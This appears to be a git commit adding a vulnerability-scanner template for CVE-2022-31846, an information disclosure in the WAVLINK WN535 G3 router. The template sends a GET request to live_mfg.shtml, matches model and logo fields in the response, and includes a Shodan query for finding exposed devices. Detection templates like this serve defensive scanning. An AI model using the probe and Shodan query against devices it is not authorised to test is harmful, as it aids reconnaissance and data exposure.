Create CVE-2022-31846.yaml
parent
689a07d542
commit
9fb9151898
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2022-31846
|
||||
|
||||
info:
|
||||
name: WAVLINK WN535 G3 -Information Disclosure
|
||||
author: arafatansari
|
||||
severity: low
|
||||
description: |
|
||||
A vulnerability is in the 'live_mfg.shtml' page of the WAVLINK WN535 G3,Firmware package version M35G3R.V5030.180927
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31846
|
||||
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md
|
||||
metadata:
|
||||
shodan-query: http.html:"Wavlink"
|
||||
verified: "true"
|
||||
tags: info,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /live_mfg.shtml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Model'
|
||||
- 'ModelType'
|
||||
- 'LOGO1'
|
||||
- 'LOGO2'
|
Loading…
Reference in New Issue